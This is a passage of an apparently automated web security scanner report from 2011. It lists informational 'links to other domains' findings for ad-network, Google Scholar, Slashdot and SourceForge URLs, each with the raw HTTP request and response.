<a href="http://www.amazon.com/dp/B0037UT1LY?tag=parenthoodcom-20&amp;camp=211493&amp;creative=379981&amp;linkCode=op1&amp;creativeASIN=B0037UT1LY&amp;adid=1E43GGA9XAJKCAEXAPNZ&amp;" target="_blank"><img class="productImage" src="http://ecx.images-amazon.com/images/I/41FKyRhFnxL._SX60_SY80_.jpg" alt="Amazon.com" /><span class="title">
...[SNIP]...
<a href="http://www.amazon.com/dp/B001AIM6V2?tag=parenthoodcom-20&amp;camp=211493&amp;creative=379981&amp;linkCode=op1&amp;creativeASIN=B001AIM6V2&amp;adid=1E43GGA9XAJKCAEXAPNZ&amp;" target="_blank"><img class="productImage" src="http://ecx.images-amazon.com/images/I/51K2a3Cte9L._SX60_SY80_.jpg" alt="Amazon.com" /><span class="title">
...[SNIP]...
<a href="http://www.amazon.com/dp/0814410960?tag=parenthoodcom-20&amp;camp=211493&amp;creative=379981&amp;linkCode=op1&amp;creativeASIN=0814410960&amp;adid=1E43GGA9XAJKCAEXAPNZ&amp;" target="_blank"><img class="productImage" src="http://ecx.images-amazon.com/images/I/512RttCMV1L._SX60_SY80_.jpg" alt="Amazon.com" /><span class="title">
...[SNIP]...
<a href="http://www.amazon.com/dp/0313363153?tag=parenthoodcom-20&amp;camp=211493&amp;creative=379981&amp;linkCode=op1&amp;creativeASIN=0313363153&amp;adid=1E43GGA9XAJKCAEXAPNZ&amp;" target="_blank"><img class="productImage" src="http://ecx.images-amazon.com/images/I/51CqnjvjUaL._SX60_SY80_.jpg" alt="Amazon.com" /><span class="title">
...[SNIP]...

20.524. http://rd.apmebf.com/w/pg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rd.apmebf.com
Path:   /w/pg

Issue detail

The page was loaded from a URL containing a query string:
  • http://rd.apmebf.com/w/pg?cont_id=11&d=f&host=media.fastclick.net
The response contains the following link to another domain:
  • http://media.fastclick.net/w/pg?cont_id=11&d=f&no_cj_c=0&upsid=517004695355

Request

GET /w/pg?cont_id=11&d=f&host=media.fastclick.net HTTP/1.1
Host: rd.apmebf.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=fks3qs-58150-1294536375707-a5

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 01:35:48 GMT
Server: Apache/2.2.4 (Unix)
Set-Cookie: S=fks3qs-58150-1294536375707-a5; domain=.apmebf.com; path=/; expires=Thu, 24-Jan-2013 01:35:48 GMT
Location: http://media.fastclick.net/w/pg?cont_id=11&d=f&no_cj_c=0&upsid=517004695355
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://media.fastclick.net/w/pg?cont_id=11&amp;d=f&amp;no_cj_c=0&amp;upsid=517004695355">here</a>
...[SNIP]...

20.525. http://scholar.google.com/schhp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scholar.google.com
Path:   /schhp

Issue detail

The page was loaded from a URL containing a query string:
  • http://scholar.google.com/schhp?hl=en&tab=ws
The response contains the following link to another domain:
  • http://www.youtube.com/?hl=en&tab=s1

Request

GET /schhp?hl=en&tab=ws HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSP=ID=0668ce1eeaf1cc06; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
Set-Cookie: PREF=ID=0668ce1eeaf1cc06:TM=1295884936:LM=1295884936:S=g7HdCkQFZkxkhdXl; expires=Wed, 23-Jan-2013 16:02:16 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 16:02:16 GMT
Server: scholar
Expires: Mon, 24 Jan 2011 16:02:16 GMT
Cache-Control: private
Connection: close

<html><head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><meta HTTP-EQUIV="imagetoolbar" content="no"><title>Google Scholar</title><style>body,td,a,p,.h{font-family:arial,sans-ser
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=s1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

20.526. http://scholar.google.com/scholar

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scholar.google.com
Path:   /scholar

Issue detail

The page was loaded from a URL containing a query string:
  • http://scholar.google.com/scholar?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=ws
The response contains the following links to other domains:
  • http://74.125.155.132/scholar?q=cache:HLaOiE6wbq4J:scholar.google.com/+ges&hl=en&as_sdt=0,9
  • http://74.125.155.132/scholar?q=cache:RrtQnTpMu7IJ:scholar.google.com/+ges&hl=en&as_sdt=0,9
  • http://74.125.155.132/scholar?q=cache:uzBEsxjt2-oJ:scholar.google.com/+ges&hl=en&as_sdt=0,9
  • http://article.pubs.nrc-cnrc.gc.ca/ppv/RPViewDoc?issn=1208-6045&volume=44&issue=4&startPage=797&ab=y
  • http://cebp.aacrjournals.org/content/16/6/1246.full
  • http://direct.bl.uk/research/26/3A/RN210703158.html?source=googlescholar
  • http://direct.bl.uk/research/53/5D/EN002056770.html?source=googlescholar
  • http://jama.ama-assn.org/cgi/content/summary/141/16/1123
  • http://onlinelibrary.wiley.com/doi/10.1111/j.1432-1033.1991.tb16207.x/full
  • http://respiratory-research.com/content/2/1/33/ref
  • http://www.ehleringer.net/Jim/Publications/157.pdf
  • http://www.jstor.org/stable/2389955
  • http://www.ojrd.com/content/4/1/7/ref
  • http://www.plantphysiol.org/cgi/content/abstract/79/3/885
  • http://www.plantphysiol.org/cgi/reprint/79/3/885.pdf
  • http://www.youtube.com/results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=s1
  • http://www3.interscience.wiley.com/journal/119225864/abstract

Request

GET /scholar?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=ws HTTP/1.1
Host: scholar.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSP=ID=0cec68e8729aa95a; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=.scholar.google.com
Set-Cookie: PREF=ID=0cec68e8729aa95a:TM=1295884936:LM=1295884936:S=B2fSiwDbwCCll2SX; expires=Wed, 23-Jan-2013 16:02:16 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 16:02:16 GMT
Server: scholar
Expires: Mon, 24 Jan 2011 16:02:16 GMT
Cache-Control: private
Connection: close

<html><head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><meta http-equiv="imagetoolbar" content="no"><title>ges - Google Scholar</title><style>#gbar,#guser{font-size:13px;padding
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=s1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
</span> <a href="http://respiratory-research.com/content/2/1/33/ref" onmousedown="return scife_clk(this.href,'ggp','res','0')">1. Macklin CC: The pulmonary alveolar mucoid film and the pneumonocytes.</a>
...[SNIP]...
<span class="gs_ggs gs_fl"><a href="http://respiratory-research.com/content/2/1/33/ref" onmousedown="return scife_clk(this.href,'gga','gga','0')"><span class=gs_ctg2>
...[SNIP]...
</a> - <a href="http://74.125.155.132/scholar?q=cache:uzBEsxjt2-oJ:scholar.google.com/+ges&amp;hl=en&amp;as_sdt=0,9">Cached</a>
...[SNIP]...
<h3><a href="http://www3.interscience.wiley.com/journal/119225864/abstract" onmousedown="return scife_clk(this.href,'','res','1')">Seasonal net carbon dioxide exchange of a beech forest with the atmosphere</a>
...[SNIP]...
</span> <a href="http://cebp.aacrjournals.org/content/16/6/1246.full" onmousedown="return scife_clk(this.href,'ggp','res','2')">Phase I dose escalation pharmacokinetic study in healthy volunteers of resveratrol, a potential cancer chemopreventive agent</a>
...[SNIP]...
<span class="gs_ggs gs_fl"><a href="http://cebp.aacrjournals.org/content/16/6/1246.full" onmousedown="return scife_clk(this.href,'gga','gga','2')"><span class=gs_ctg2>
...[SNIP]...
</a> - <a href="http://direct.bl.uk/research/26/3A/RN210703158.html?source=googlescholar" onmousedown="return scife_clk(this.href,'','docdel','2')">BL Direct</a>
...[SNIP]...
<h3><a href="http://jama.ama-assn.org/cgi/content/summary/141/16/1123" onmousedown="return scife_clk(this.href,'','res','3')">Some newer aspects of the management of infertility</a>
...[SNIP]...
</span> <a href="http://www.ojrd.com/content/4/1/7/ref" onmousedown="return scife_clk(this.href,'ggp','res','4')">3. Klintworth GK: The molecular genetics of the corneal dystrophies...current status.</a>
...[SNIP]...
<span class="gs_ggs gs_fl"><a href="http://www.ojrd.com/content/4/1/7/ref" onmousedown="return scife_clk(this.href,'gga','gga','4')"><span class=gs_ctg2>
...[SNIP]...
</a> - <a href="http://74.125.155.132/scholar?q=cache:HLaOiE6wbq4J:scholar.google.com/+ges&amp;hl=en&amp;as_sdt=0,9">Cached</a>
...[SNIP]...
<h3><a href="http://www.plantphysiol.org/cgi/content/abstract/79/3/885" onmousedown="return scife_clk(this.href,'','res','6')">Germination, respiration, and adenylate energy charge of seeds at various oxygen partial pressures</a>
...[SNIP]...
<span class="gs_ggs gs_fl"><a href="http://www.plantphysiol.org/cgi/reprint/79/3/885.pdf" onmousedown="return scife_clk(this.href,'gga','gga','6')"><span class=gs_ctg2>
...[SNIP]...
<h3><a href="http://onlinelibrary.wiley.com/doi/10.1111/j.1432-1033.1991.tb16207.x/full" onmousedown="return scife_clk(this.href,'','res','7')">Kinetic studies of the variations of cytoplasmic pH, nucleotide triphosphates (31P...NMR) and lactate during normoxic and anoxic transitions in maize root tips</a>
...[SNIP]...
<h3><a href="http://www.jstor.org/stable/2389955" onmousedown="return scife_clk(this.href,'','res','8')">Hydrogen and carbon isotope ratios of selected species of a Mediterranean macchia ecosystem</a>
...[SNIP]...
<span class="gs_ggs gs_fl"><a href="http://www.ehleringer.net/Jim/Publications/157.pdf" onmousedown="return scife_clk(this.href,'gga','gga','8')"><span class=gs_ctg2>
...[SNIP]...
</a> - <a href="http://direct.bl.uk/research/53/5D/EN002056770.html?source=googlescholar" onmousedown="return scife_clk(this.href,'','docdel','8')">BL Direct</a>
...[SNIP]...
<h3><a href="http://article.pubs.nrc-cnrc.gc.ca/ppv/RPViewDoc?issn=1208-6045&amp;volume=44&amp;issue=4&amp;startPage=797&amp;ab=y" onmousedown="return scife_clk(this.href,'','res','9')">Pressure broadening of the rotational Raman lines of some simple gases</a>
...[SNIP]...
</a> - <a href="http://74.125.155.132/scholar?q=cache:RrtQnTpMu7IJ:scholar.google.com/+ges&amp;hl=en&amp;as_sdt=0,9">Cached</a>
...[SNIP]...

20.527. http://slashdot.org/bookmark.pl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://slashdot.org
Path:   /bookmark.pl

Issue detail

The page was loaded from a URL containing a query string:
  • http://slashdot.org/bookmark.pl?url={u}&title={t}
The response contains the following links to other domains:
  • http://a.fsdn.com/sd/all-minified.js?T_2_5_0_305
  • http://a.fsdn.com/sd/core-tidied.css?T_2_5_0_305
  • http://b.scorecardresearch.com/p?c1=2&c2=6035546&c3=&c4=&c5=&c6=&c15=&cj=1
  • http://geek.net/
  • http://geek.net/advertising
  • http://geek.net/privacy-statement
  • http://geek.net/terms.php
  • http://sourceforge.net/tracker/?func=add&group_id=4421&atid=104421

Request

GET /bookmark.pl?url={u}&title={t} HTTP/1.1
Host: slashdot.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.42 (Unix) mod_perl/1.31
X-Powered-By: Slash 2.005001305
X-Leela: You did the best you could, I guess, and some of these gorillas are okay.
X-XRDS-Location: http://slashdot.org/slashdot.xrds
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 23844
Date: Tue, 25 Jan 2011 13:16:10 GMT
X-Varnish: 2121089048
Age: 0
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script id="before-content" type="text/javascript">
var pageload = {
   pagemark: '12
...[SNIP]...
</title>

<link rel="stylesheet" type="text/css" media="screen, projection" href="//a.fsdn.com/sd/core-tidied.css?T_2_5_0_305" >
<!--[if gte IE 8]>
...[SNIP]...
<![endif]-->


<script src="//a.fsdn.com/sd/all-minified.js?T_2_5_0_305" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://sourceforge.net/tracker/?func=add&amp;group_id=4421&amp;atid=104421">Bugs</a>
...[SNIP]...
<p>

           All trademarks and copyrights on this page are owned by their respective owners. Comments are owned by the Poster. The Rest &copy; 1997-2011 <a href="http://geek.net/">Geeknet, Inc.</a>
...[SNIP]...
<li><a href="http://geek.net/advertising">advertise</a>
...[SNIP]...
<li><a href="http://geek.net/terms.php">terms of service</a>
...[SNIP]...
<li><a href="http://geek.net/privacy-statement">privacy</a>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6035546&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="comScore2"></noscript>
...[SNIP]...

20.528. http://sourceforge.net/softwaremap/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /softwaremap/

Issue detail

The page was loaded from a URL containing a query string:
  • http://sourceforge.net/softwaremap/?fq%5B%5D\\x3dtrove:20\\x26amp;sort\\x3dlatest_file_date\\x26amp;sortdir\\x3ddesc\\x26amp;limit\\x3d100\\x22
The response contains the following links to other domains:
  • http://b.collective-media.net/seg/cm/cm_aa_gn1
  • http://b.scorecardresearch.com/p?c1=2&c2=6035546&c3=&c4=&c5=&c6=&c15=&cj=1
  • http://geek.net/
  • http://geek.net/advertising/
  • http://geek.net/careers/
  • http://p.sf.net/sourceforge/getsupport
  • http://p.sf.net/sourceforge/privacy
  • http://p.sf.net/sourceforge/terms
  • http://twitter.com/sourceforge

Request

GET /softwaremap/?fq%5B%5D\\x3dtrove:20\\x26amp;sort\\x3dlatest_file_date\\x26amp;sortdir\\x3ddesc\\x26amp;limit\\x3d100\\x22 HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-6
Set-Cookie: PHPSESSID=c9a0c9e1734e82873111a96cf441cae9; expires=Mon, 07-Feb-2011 16:02:35 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:02:35 GMT
Server: lighttpd/1.4.26
Content-Length: 99039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Create Server: sfs-web-6 -->
<!--
~ SourceForge.net: Find and B
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6035546&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<li><a href="http://p.sf.net/sourceforge/getsupport">Site Support</a>
...[SNIP]...
<li><a href="http://geek.net/careers/">Jobs @ Geeknet</a>
...[SNIP]...
<li><a href="http://geek.net/advertising/">Advertising</a>
...[SNIP]...
<li><a href="http://twitter.com/sourceforge" rel="nofollow">@sourceforge on Twitter</a>
...[SNIP]...
<p class="copyright">&copy; 2011 <a title="Network which provides and promotes Open Source software downloads, development, discussion and news." href="http://geek.net">Geeknet, Inc.</a> <a href="http://p.sf.net/sourceforge/terms">Terms of Use</a> <a href="http://p.sf.net/sourceforge/privacy">Privacy Policy</a>
...[SNIP]...
<!-- Collective tag -->
<img src="//b.collective-media.net/seg/cm/cm_aa_gn1" width="1" height="1" />
<!-- End Collective tag -->
...[SNIP]...

20.529. http://tag.admeld.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:
  • http://tag.admeld.com/pixel?admeld_adprovider_id=12&expiration=30days&custom_segment4=1&custom_segment504=1&redirect=http://ad.yieldmanager.com/pixel?id=708017&t=2&redirect=http://pixel.rubiconproject.com/tap.php?v=3615
The response contains the following link to another domain:
  • http://ad.yieldmanager.com/pixel?id=708017&t=2&redirect=http://pixel.rubiconproject.com/tap.php?v=3615

Request

GET /pixel?admeld_adprovider_id=12&expiration=30days&custom_segment4=1&custom_segment504=1&redirect=http://ad.yieldmanager.com/pixel?id=708017&t=2&redirect=http://pixel.rubiconproject.com/tap.php?v=3615 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: D41U=3Nyj5fipbZBWiT7eNY-OMuK0KbpdEAgp0GrH-wWfsMRl3pcGRo-aEow; meld_sess=6acccca4-d0e4-464e-a824-f67cb28d5556

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Location: http://ad.yieldmanager.com/pixel?id=708017&t=2&redirect=http://pixel.rubiconproject.com/tap.php?v=3615
Content-Length: 294
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 25 Jan 2011 01:35:48 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ad.yieldmanager.com/pixel?id=708017&amp;t=2&amp;redirect=http://pixel.rubiconproject.com/tap.php?v=3615">here</a>
...[SNIP]...

20.530. http://tags.bluekai.com/site/10

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/10

Issue detail

The page was loaded from a URL containing a query string:
  • http://tags.bluekai.com/site/10?ret=html&phint=pageName%3Dunknown&phint=pageRequestID%3D427D360F-AD19-8945-2CEDA65620083A33&phint=affiliateGroupName%3DSearch%20Engine%20Optimization%20Project&phint=affiliateName%3DSEO%20DTS%20-%20Google%20ABTL%2013148&phint=campaign%3D13148&phint=__bk_t%3DBuy%20your%20next%20new%20or%20used%20car%20online%20with%20our%20New%20Car%20Pricing%20Guides%2C%20Car%20Reviews%2C%20Vehicle%20Comparisons%20and%20Used%20Car%20Inventory%20services.%20%7C%20Autobytel.com&phint=__bk_k%3DPricing%2CGuide%2Cbuy%20a%20new%20car%2Cbuy%20a%20used%20auto%2Cnew%20auto%2Cused%20auto%2Cnew%20car%2Cused%20car%2Cnew%20car%20pricing%2Cused%20car%20pricing%2Cdealer%2Clocal%20dealer%2C%20new%20car%20inventory%2C%20used%20car%20inventory&limit=10&r=42794077
The response contains the following links to other domains:
  • http://ad.yieldmanager.com/pixel?adv=60652&code=AS17&t=2&rnd=1327772520
  • http://cm.g.doubleclick.net/pixel?nid=bluekai&
  • http://osmdcs.interclick.com/pixel.aspx?dp=9EB38251-1678-4E23-B7B6-B2C1C9AD075C&sid=17&account=ALL

Request

GET /site/10?ret=html&phint=pageName%3Dunknown&phint=pageRequestID%3D427D360F-AD19-8945-2CEDA65620083A33&phint=affiliateGroupName%3DSearch%20Engine%20Optimization%20Project&phint=affiliateName%3DSEO%20DTS%20-%20Google%20ABTL%2013148&phint=campaign%3D13148&phint=__bk_t%3DBuy%20your%20next%20new%20or%20used%20car%20online%20with%20our%20New%20Car%20Pricing%20Guides%2C%20Car%20Reviews%2C%20Vehicle%20Comparisons%20and%20Used%20Car%20Inventory%20services.%20%7C%20Autobytel.com&phint=__bk_k%3DPricing%2CGuide%2Cbuy%20a%20new%20car%2Cbuy%20a%20used%20auto%2Cnew%20auto%2Cused%20auto%2Cnew%20car%2Cused%20car%2Cnew%20car%20pricing%2Cused%20car%20pricing%2Cdealer%2Clocal%20dealer%2C%20new%20car%20inventory%2C%20used%20car%20inventory&limit=10&r=42794077 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJ0fyXF9XJlJlJKHRH/q9T1wLfAFvT1AcyBe3gTVD9y9Uh9aYy==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCx8Vs/gFfw0GIU4J1ufsW6ue6EytNEOGRGe0XtExLxebEKLRWOEvz61pOXhbJFah1e9pBe3EDeyT3qbfCTgWet1w9011QZ1evAbZ+ONx49NDLpQPD9xj9OLh19DDoQSQ==; bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxgyXR9wBpxh1n/6LnutBe/6+e9pBMRtwNJFf9QY26izl; bk=dOTA6tBCxZ/sHNJo; bkc=KJhnRtPQrOgmyceoM3DF/y1exh3xnXsn0G2Cx4O8KHQRdQAy1C0oBT4pFfmCXAc3R4yxeQRsgPysC+ybOaXeMx2ueImc1DeTdkeISiT/dfKyoiXpxT1+isd5iLg4FO7OgTKb+T9jGCdWM64MdTC9XYmj/Kol18Ae2EmOIzt03wyah3MXCVMXvePsmwXeNn6wZueZQdQOlvCX83IGdO8tHMi47hridpRulXLRk4dLs0o4VJGHpA2ACmMd+XF9ky7v72KBTewyxrHE2qU9bAaXh68DdkDPHCEIUMPDF3xbv+dS9jUFQzSUEDeyK2QC27XahCK1qhIc0759TXFV/FicGmsg7vRW82+hGdJ8eicT7WYIRy13wbDjkq2FmG/w9BZIKeT=

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 21:06:44 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=Sbr2orXnuT6sHNJo; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpMRZOQ0s5CRcM06+SUWzMZ9rJ1BcT1skIx9zawRtPQrOgmyceoMiVznXsn0Q4oCda8KHQRdQAy1C0oBT4pFfmCXAc3R4yxeQRsgPysC+ybOaXeMx2ueImcx5lgeIVF8Gny4y+gIM/pBBiYIBS+3wpBZhcXK3CfY8QCIAcXKeEIMyQWw8/jG7TlApkxwhmRl00n0k2QM1o4i1SwDZmWXp29l4rxYV/IiOd9Mzo7dGgvfta7Cww8rucbq0whFRhHIzIIG4vaoH7CdWHsiw8dryhXZSeXK56/wQ1FHe8PUyrLcLHlfWEkUNPCHmcFPDwkub3MX365DwAKScpjO9udChNidN5Q41cT27sG49z6FZy+Q7X/sgfvSDoyFC6lvod7W/nwYKxfB3e0D8oHI4rZ/dQ95omeay==; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0qh1q9XmukguXqQpzFC1U//1zcR26Oi7N71QK0J/ai34oSxOR9PgTnh9==; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxArHCjbX+9DvX4v9fE9l1pYhBnv6+ex0BnRy1exlBM8uqITn9YsAnPA=; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzioSxcueEn4LRWOEvz61pOXhtnwn39IjGjuSySsaE4Uz4aRQDhCTsPQAWNQjWMPNTv3eTYgkyqq9yJOOLhm3tpHl4VgnZ+w0Kx1Khi2Q97AAi5te9yhFpkp9qpZCTX=; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 25-Jan-2011 21:06:44 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 430
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://cm.g.doubleclick.net/pixel?nid=bluekai&" width=1 height=1 border=0 alt="">
<img src="http://osmdcs.interclick.com/pixel.aspx?dp=9EB38251-1678-4E23-B7B6-B2C1C9AD075C&sid=17&account=ALL" width=1 height=1 border=0 alt="">
<img src="http://ad.yieldmanager.com/pixel?adv=60652&code=AS17&t=2&rnd=1327772520" width=1 height=1 border=0 alt="">

</div>
...[SNIP]...

20.531. http://tags.bluekai.com/site/10

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/10

Issue detail

The page was loaded from a URL containing a query string:
  • http://tags.bluekai.com/site/10?ret=html&phint=pageName%3Dunknown&phint=pageRequestID%3D427D360F-AD19-8945-2CEDA65620083A33&phint=affiliateGroupName%3DSearch%20Engine%20Optimization%20Project&phint=affiliateName%3DSEO%20DTS%20-%20Google%20ABTL%2013148&phint=campaign%3D13148&phint=__bk_t%3DBuy%20your%20next%20new%20or%20used%20car%20online%20with%20our%20New%20Car%20Pricing%20Guides%2C%20Car%20Reviews%2C%20Vehicle%20Comparisons%20and%20Used%20Car%20Inventory%20services.%20%7C%20Autobytel.com&phint=__bk_k%3DPricing%2CGuide%2Cbuy%20a%20new%20car%2Cbuy%20a%20used%20auto%2Cnew%20auto%2Cused%20auto%2Cnew%20car%2Cused%20car%2Cnew%20car%20pricing%2Cused%20car%20pricing%2Cdealer%2Clocal%20dealer%2C%20new%20car%20inventory%2C%20used%20car%20inventory&limit=10&r=42794077
The response contains the following links to other domains:
  • http://ad.yieldmanager.com/pixel?adv=60652&code=AS17&t=2&rnd=874442296
  • http://osmdcs.interclick.com/pixel.aspx?dp=9EB38251-1678-4E23-B7B6-B2C1C9AD075C&sid=17&account=ALL

Request

GET /site/10?ret=html&phint=pageName%3Dunknown&phint=pageRequestID%3D427D360F-AD19-8945-2CEDA65620083A33&phint=affiliateGroupName%3DSearch%20Engine%20Optimization%20Project&phint=affiliateName%3DSEO%20DTS%20-%20Google%20ABTL%2013148&phint=campaign%3D13148&phint=__bk_t%3DBuy%20your%20next%20new%20or%20used%20car%20online%20with%20our%20New%20Car%20Pricing%20Guides%2C%20Car%20Reviews%2C%20Vehicle%20Comparisons%20and%20Used%20Car%20Inventory%20services.%20%7C%20Autobytel.com&phint=__bk_k%3DPricing%2CGuide%2Cbuy%20a%20new%20car%2Cbuy%20a%20used%20auto%2Cnew%20auto%2Cused%20auto%2Cnew%20car%2Cused%20car%2Cnew%20car%20pricing%2Cused%20car%20pricing%2Cdealer%2Clocal%20dealer%2C%20new%20car%20inventory%2C%20used%20car%20inventory&limit=10&r=42794077 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
